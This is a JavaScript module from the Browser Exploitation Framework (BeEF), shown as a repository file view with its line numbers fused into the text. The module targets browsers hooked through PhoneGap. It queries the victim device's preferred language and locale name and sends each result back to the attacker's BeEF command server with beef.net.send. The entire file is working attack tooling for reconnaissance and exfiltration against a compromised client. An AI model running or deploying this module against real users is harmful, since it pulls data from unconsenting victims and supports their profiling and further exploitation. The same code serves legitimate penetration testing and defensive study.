Path: blob/master/modules/phonegap/phonegap_globalization_status/command.js
1154 views
//1// Copyright (c) 2006-2025 Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56// Phonegap_globalization_status7//8beef.execute(function() {9var result = '';1011navigator.globalization.getPreferredLanguage(12function (language) {13result = 'language: ' + language.value + '\n';14beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );15},16function () {17result = 'language: ' + 'fail\n';18beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );19}20);2122navigator.globalization.getLocaleName(23function (locale) {24result = 'locale: ' + locale.value + '\n';25beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );26},27function () {28result = 'locale: ' + 'fail\n';29beef.net.send("<%= @command_url %>", <%= @command_id %>, 'result='+result );30}31);3233});3435